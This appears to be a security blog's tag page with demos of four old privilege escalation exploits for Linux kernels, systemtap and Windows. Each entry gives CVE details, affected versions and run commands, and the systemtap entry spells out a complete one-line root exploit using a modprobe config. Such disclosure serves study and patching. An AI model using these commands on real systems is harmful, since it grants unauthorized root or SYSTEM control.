aka wow on ZATAZ.com
Posts tagged Kernel
CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo
03 months ago
in Exploits
Timeline :
Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability the 2012-01-18
Exploit provided the 2012-01-23
PoC provided by :
zx2c4 (Jason A. Donenfeld)
Reference(s) :
Affected version(s) :
Linux kernel’s above or equal to 2.6.39 (32 bit or 64 bit).
Tested on Ubuntu 11.10 with :
Linux ubuntu 3.0.0-15-generic
Description :
Mempodipper is an exploit for CVE-2012-0056 exploiting an issue in the handling of the /proc/pid/mem writing functionality, where permissions are not being properly checked in the Linux kernel version 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.
Commands :
whoami gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c ./CVE-2012-0056-Mempodipper whoami
CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability
21 year ago
in Exploits
Timeline :
Vulnerability reported to vendors, by Tavis Ormandy, the 2010-11-15
Vulnerability corrected by vendors around the 2010-11-17
PoC provided by :
Tavis Ormandy
Reference(s) :
Affected version(s) :
Red Hat, Fedora, Debian, Ubuntu, etc.
Tested on Debian squeeze/sid with :
systemtap-runtime_1.0-2_i386.deb
Description :
It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.
Commands :
Require “systemtap-runtime” on Debian
id
printf “install uprobes /bin/sh” exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever
id
MS11-011 : Windows UAC Bypass 0day
01 year ago
in Various
Timeline :
Vulnerability released by noobpwnftw the 2010-11-24
PoC provided by :
noobpwnftw
Reference(s) :
CVE-2010-4398
EBD-ID-15609
MS11-011
Affected version(s) :
Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64
Tested on Windows 7 Integral
Description :
Microsoft Windows does not adequately validate registry data read using the function RtlQueryRegistryValues(). By modifying an EUDC registry key value, a local user could execute arbitrary code with SYSTEM privileges.
Commands :
whoami
poc.exe
whoami
full-nelson.c Linux Kernel local privilege escalation
01 year ago
in Exploits
Timeline :
CVE-2010-3849 reported by Nelson Elhagethe the 2010-10-18
CVE-2010-3850 reported by Nelson Elhagethe the 2010-10-18
CVE-2010-4258 reported by Nelson Elhagethe the 2010-12-02
PoC provided by :
Dan Rosenberg
Nelson Elhage
Reference(s) :
CVE-2010-3849
CVE-2010-3850
CVE-2010-4258
Affected version(s) :
All Linux Kernel versions previous to the 2.6.37 version
Tested on Ubuntu 10.10 server
Description :
This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage.
Commands :
uname -a
uid
gcc full-nelson.c -o full-nelson
./full-neslon
uid
Recent Comments